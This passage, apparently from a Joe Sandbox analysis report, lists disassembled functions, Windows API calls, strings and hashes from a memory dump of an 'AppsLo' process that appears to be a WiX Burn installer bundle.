Instruction Fuzzy Hash: 8AF08176A0416AABDB209F86DC499AB7FA8FF06760B014154BD58EB261E731DC10D7E0

Function 008A3838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 008A3877
GetLastError.KERNEL32 ref: 008A3881
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 008A38EA

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: 8673eacc211a83bb4994e57a89524bc2e5821db304a544d796e622ab7b29f722
Instruction ID: 1e670fb04efbe9cb9593d806c51b0c5ed9cf3a38c235436b0549729365e8f74a
Opcode Fuzzy Hash: 8673eacc211a83bb4994e57a89524bc2e5821db304a544d796e622ab7b29f722
Instruction Fuzzy Hash: 1621F5B2D0173DA7EB209B659C45F9B7BA8FB02720F1501B5BE14EB241DA74DE408BD0

Function 008A3A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,008A3BB6,00000000,?,008A1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008A13B8), ref: 008A3A20
RtlFreeHeap.NTDLL(00000000,?,008A3BB6,00000000,?,008A1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008A13B8,000001C7,00000100), ref: 008A3A27
GetLastError.KERNEL32(?,008A3BB6,00000000,?,008A1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008A13B8,000001C7,00000100,?), ref: 008A3A31

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: 21e856848546118584b5ed193e5f42840a1d2bb79f3394df28abd46854c61ced
Instruction ID: 34e1d1f8e85e610d25f64acc15dbdfea85f62e81b611f4b7f01c52618a7ee039
Opcode Fuzzy Hash: 21e856848546118584b5ed193e5f42840a1d2bb79f3394df28abd46854c61ced
Instruction Fuzzy Hash: B9D0C233A0453957832117E66C8C95B7E58FF01AB17010020FD48DB220D721DC0082E0

Function 008E0F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0090AAA0,00000000,?,008E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008E0F80

Strings

regutil.cpp, xrefs: 008E0FC3

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: 1b5077b2cac9d3d69cfffe659881cf3f1fa099acb8564006fdb7801ae0963384
Instruction ID: 25ac0417526a26388dc10d96d8fc15e87e2d5e1cc429a9de9be72997c7d78976
Opcode Fuzzy Hash: 1b5077b2cac9d3d69cfffe659881cf3f1fa099acb8564006fdb7801ae0963384
Instruction Fuzzy Hash: 08F04C336011B67ADB3005974C01B6BAA55FB827B0B154A257D46EA1C0DEA18C60AEF0

Function 008DF49A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DF491

Part of subcall function 008E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008E9A09
Part of subcall function 008E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008E9A1A

Strings

PA9l, xrefs: 008DF48B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PA9l
API String ID: 1269201914-3515979648
Opcode ID: acc008b39b690c4d7d53b90a69ff48bdaa734105ad3cd07ada45558ef406b538
Instruction ID: 032a7e0b4a5c62c4484f50593e6c9084aba76f74976d6657c53744ca254787b5
Opcode Fuzzy Hash: acc008b39b690c4d7d53b90a69ff48bdaa734105ad3cd07ada45558ef406b538
Instruction Fuzzy Hash: 6BB012A13696016DB254711D1D03D37064CD5C6F79331426FF091C11D2E8800C016137

Function 008DF4AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DF491

Part of subcall function 008E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008E9A09
Part of subcall function 008E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008E9A1A

Strings

PA9l, xrefs: 008DF48B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PA9l
API String ID: 1269201914-3515979648
Opcode ID: cf79077c2742a7d220525e7ae2b56ae4d16c096fd27bf39096dfa8186fad15bc
Instruction ID: 85fdd1a00f84ad885ff26c0d50a78e92816be7b6b07187af55cca9c66b9323d8
Opcode Fuzzy Hash: cf79077c2742a7d220525e7ae2b56ae4d16c096fd27bf39096dfa8186fad15bc
Instruction Fuzzy Hash: 6CB012A13697016CB254711D1C02C37064CD5C6F79331836FF091C11D2E8800C406137

Function 008DF479 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008DF491

Part of subcall function 008E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008E9A09
Part of subcall function 008E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008E9A1A

Strings

PA9l, xrefs: 008DF479, 008DF48B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: PA9l
API String ID: 1269201914-3515979648
Opcode ID: 01ea68310736fbdb84a1206fc15d2643226314cac7f827cfe04268ba7561319d
Instruction ID: 46cbb7f625c41946dc6a5a7aa02ba60e8b88160c20f2ed63512b75026d13b6c5
Opcode Fuzzy Hash: 01ea68310736fbdb84a1206fc15d2643226314cac7f827cfe04268ba7561319d
Instruction Fuzzy Hash: 76B012A536A6017CB21431191C02C37060CD5C2F79331C36FF491C00D2E8800C006077

Function 008E35C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008E35F8

Part of subcall function 008E304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,008E3609,00000000,?,00000000), ref: 008E3069
Part of subcall function 008E304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,008CC025,?,008A5405,?,00000000,?), ref: 008E3075

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: 938b73faf59235f54fa32b333be1a0f233f6d0fd46263f706a03cb5cc0fb1d0b
Instruction ID: a3ff7f8f2759ca70068ec2b98a267ede046e871e1dc4cfb713e2fec7d8e73733
Opcode Fuzzy Hash: 938b73faf59235f54fa32b333be1a0f233f6d0fd46263f706a03cb5cc0fb1d0b
Instruction Fuzzy Hash: 47314D76E00269AFCB11DFA9C888ADEB7F8FF09710F01456AED15EB311D6319D008BA4

Function 008E5870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,0090AAA0,00000000,80070490,?,?,008B8B19,WiX\Burn,PackageCache,00000000,0090AAA0,00000000,00000000,80070490), ref: 008E58CA

Part of subcall function 008E10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008E112B
Part of subcall function 008E10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008E1163

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: f21e347db1079cf61cd9b4c13f6bec434b0d5444986fdd5091e2c270221ab6e1
Instruction ID: b0e9ca4cfae6aa2a2ade87409bb739f338315e4a425d436148b7f4cc2f3e465d
Opcode Fuzzy Hash: f21e347db1079cf61cd9b4c13f6bec434b0d5444986fdd5091e2c270221ab6e1
Instruction Fuzzy Hash: E611A3368006BEEF8B216E9A88419AFB768FF46328B114139ED01A7111C7314E50D7D1

Function 008A34B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,008B8BD3,0000001C,80070490,00000000,00000000,80070490), ref: 008A34D5

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: bcdc4ae66d2e556a516df8ca9f1ea62695397f582c4ec3d79a5ea76929c3323b
Instruction ID: 5fdb1a46aaa6700494da93f3bd75872c176bde6c3b8970266aabd898933ae600
Opcode Fuzzy Hash: bcdc4ae66d2e556a516df8ca9f1ea62695397f582c4ec3d79a5ea76929c3323b
Instruction Fuzzy Hash: 17E05B722021257BFB122F655C05DEB7B9DFF1A364B008051FE40D6510E776D55087B5

Function 008E2EFE Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,00000000,008A556E,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E2F0B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: fad9404e8769300198f9a1f402c295585f4f2980fafbef810bae9cc6016c42a3
Instruction ID: 6ad14c7da7ebc37b7e361b3e3c7f0ffb951891df8697c99d5acc2414b545ea51
Opcode Fuzzy Hash: fad9404e8769300198f9a1f402c295585f4f2980fafbef810bae9cc6016c42a3
Instruction Fuzzy Hash: 96E0F6B193E664DECB108F69BD94A427ABCF709B60304420BB804D3220CBB24481AFA0

Function 008E9684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008E966B

Part of subcall function 008E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008E9A09
Part of subcall function 008E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008E9A1A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 48b12d362c73662b6f59aeb293a9f9d3d58892b7c373efc2019a439791ab97b6
Instruction ID: faea17dbfe3989241888a4bf1e2185927207b5b6c8f2ef7f1ebac8ef812d7347
Opcode Fuzzy Hash: 48b12d362c73662b6f59aeb293a9f9d3d58892b7c373efc2019a439791ab97b6
Instruction Fuzzy Hash: A6B012913683416CBA54724E2E43C37054CD5C2F55331411FF4A1D10E2E8C00C010273

Function 008E9653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008E966B

Part of subcall function 008E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008E9A09
Part of subcall function 008E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008E9A1A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f7400fc0f12868450d636d12fa67fb0a089181bd2f61bfa555a5c6a2865f274c
Instruction ID: 258a188acf94f04f74a9373fe8a05f4cec722cab8caf351557e1e24b3edad267
Opcode Fuzzy Hash: f7400fc0f12868450d636d12fa67fb0a089181bd2f61bfa555a5c6a2865f274c
Instruction Fuzzy Hash: C0B012913683457CBA14320A6C82C37050CE5C2F55331811FF4A1E00E2E8C00C000377

Function 008E9674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 008E966B

Part of subcall function 008E998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008E9A09
Part of subcall function 008E998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008E9A1A

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a6e14c9d60d535e9349ac4695f65b34359dcd708abdc10fabb01e20422faf17d
Instruction ID: a150503519d0e82f8f12201a254569203254cd3cfdddcc5c9fda258d41476db7
Opcode Fuzzy Hash: a6e14c9d60d535e9349ac4695f65b34359dcd708abdc10fabb01e20422faf17d
Instruction Fuzzy Hash: 77B012913683426CB654721E1C03C37054CD1C2B15331C11FF8A1C10E2E8C00C040373

Function 008A14B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,008A21A8,?,00000000,?,00000000,?,008A390C,00000000,?,00000104), ref: 008A14E8

Part of subcall function 008A3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008A21CC,000001C7,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3BDB
Part of subcall function 008A3BD3: HeapSize.KERNEL32(00000000,?,008A21CC,000001C7,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3BE2

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: 3c743bb032c5e1e0cbc76b780f222e5c346a10e344696ef2ad4c37bd5ec7f75b
Instruction ID: 511e6622c47da1072f98f393fdb9c42e59528dfeb8179306f30fd8d90401eee2
Opcode Fuzzy Hash: 3c743bb032c5e1e0cbc76b780f222e5c346a10e344696ef2ad4c37bd5ec7f75b
Instruction Fuzzy Hash: A901493360122CABEF115E58DCCCF9A77A7FF8A760F104215FA16DB951D631AC0086E4

Non-executed Functions

Function 008E1719 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 337COMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 008E17B1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E17BB
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 008E1808
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E180E
CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 008E1848
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E184E
CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 008E188E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E1894
CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 008E18D4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E18DA
CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 008E191A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E1920
SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 008E1A11
SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 008E1A4B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E1A55
SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 008E1A8D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E1A97
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008E1AD0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E1ADA
CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 008E1B18
LocalFree.KERNEL32(?), ref: 008E1B2E

Strings

srputil.cpp, xrefs: 008E17DC

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
String ID: srputil.cpp
API String ID: 267631441-4105181634
Opcode ID: 0187b7a419803ed61abb6cccbc3470519ecea15ea86953ecece742016bc75428
Instruction ID: 4378a2387c495fe6e6c8231132e1a33a19a2e28d1fcf30ab2c733531746eecdd
Opcode Fuzzy Hash: 0187b7a419803ed61abb6cccbc3470519ecea15ea86953ecece742016bc75428
Instruction Fuzzy Hash: 93C13376D4127DABDB308B968C48BDFBAB8FF45750F0101AAA915F7250E7709D408EA0

Function 008CC332 Relevance: 37.1, APIs: 1, Strings: 20, Instructions: 376COMMON

Download Yara Rule

Strings

-%ls, xrefs: 008CC34C
Failed to allocate memory for pseudo bundle payload hash., xrefs: 008CC4AD
Failed to copy key for pseudo bundle., xrefs: 008CC542
Failed to append relation type to repair arguments for related bundle package, xrefs: 008CC5F1
Failed to copy filename for pseudo bundle., xrefs: 008CC417
Failed to copy key for pseudo bundle payload., xrefs: 008CC3F3
Failed to copy install arguments for related bundle package, xrefs: 008CC584
Failed to copy uninstall arguments for related bundle package, xrefs: 008CC623
Failed to copy repair arguments for related bundle package, xrefs: 008CC5D0
Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 008CC385
pseudobundle.cpp, xrefs: 008CC379, 008CC3B2, 008CC4A1, 008CC6D2
Failed to append relation type to uninstall arguments for related bundle package, xrefs: 008CC644
Failed to copy cache id for pseudo bundle., xrefs: 008CC55F
Failed to copy display name for pseudo bundle., xrefs: 008CC74F
Failed to allocate space for burn payload inside of related bundle struct, xrefs: 008CC3BE
Failed to copy local source path for pseudo bundle., xrefs: 008CC43B
Failed to append relation type to install arguments for related bundle package, xrefs: 008CC5A9
Failed to allocate memory for dependency providers., xrefs: 008CC6DE
Failed to copy version for pseudo bundle., xrefs: 008CC72D
Failed to copy download source for pseudo bundle., xrefs: 008CC469

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
API String ID: 1357844191-2832335422
Opcode ID: cb2f133a0072f94a68649b256a096fa90552fcf1edd2ea789ff7272ffbe3eaaf
Instruction ID: 991ffeb46db15f11dc87c724a701c73c29247f1ff65f3d5f5976e3507eae69c0
Opcode Fuzzy Hash: cb2f133a0072f94a68649b256a096fa90552fcf1edd2ea789ff7272ffbe3eaaf
Instruction Fuzzy Hash: 80C1CF71A0061AABDB25DF38C881F6A77B9FF09714B01412EFA19EB741DB70EC109B91

Function 008A45EE Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 141sleepshutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 008A4617
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 008A461E
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 008A4628
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 008A4678
GetLastError.KERNEL32 ref: 008A4682
